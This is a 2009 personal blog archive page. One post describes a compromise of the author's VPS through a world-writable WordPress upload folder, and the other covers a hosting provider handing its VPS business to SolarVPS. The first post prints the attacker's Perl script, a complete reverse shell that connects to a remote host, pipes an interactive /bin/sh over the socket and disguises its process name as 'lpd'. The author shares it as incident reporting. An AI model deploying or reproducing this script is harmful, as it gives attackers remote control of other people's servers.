h4x3d.com

- h4x3d.com

Archive
Tag "solarVPS"

Latest downtime due to CHMOD 777 insecurity

By: jez
02-03-2009
unsorted
0 comments

exploit, random image however

Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.

Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Read More

Zone.net carves out their VPS business to SolarVPS

By: jez
26-02-2009
unsorted
0 comments
Solar VPS - Green hosting

Solar VPS - Green hosting

Today I have received an email from Sean at zone.net stating that effective from four months now onwards all VPS (Virtual Private Server) business will be transfered to SolarVPS.

Sean speaks very highly of SolarVPS’ CEO and managing director and excuses for the “crap” level of support that zone.net customers had to endure in the past few months.

The official press release can be found on Solar VPS’ news section. Being transparent about communication is one of the major pillars of decent business – “I like”.

Some famous highlights include the multi-day downtime due to some failure and a for-ages taking check-disk (from 11:48 AM EST(11/7/2008) to 7:19 PM EST (11/9/2008), where as it would be more like 9am to 8pm, frankly)

Also some minor, less exciting downtimes of twelve to twenty hours recently can be recalled by some of you.

My phone-calls to the 001 yank-hotline have been answered but greeted with massive unfriendliness and really low level of knowledge stating “we are aware that our sites (cough and yours) are currently unavailable”.

I am curious what the time at SolarVPS will bring – the mail sent by Sean listed an email address by which management might be contacted directly.

If SolarVPS prolong zone.net’s sponsorship agreement I would be keen to give them a ride.

In the meantime, if you have any other recommendations or comments, feel free to contact me.

Oh- and the new site is coming, I am currently just looking into a way to politely tell IE6 visitors (still 26% over the past few months) to upgrade or switch.

Having worked in a major PR company in the last six month and having experienced the (probably worst) “almost” over-sea like IT support, I see the problems with upgrading, however believe it should be able to replace a seven year old piece of software with something newer (IE7, IE8 beta, Firefox, Opera, Safari, etc).

Read More

Categories

Archives

© 2011 h4x3d.com.

1,776 comments on this temporary theme for two weeks | thanks.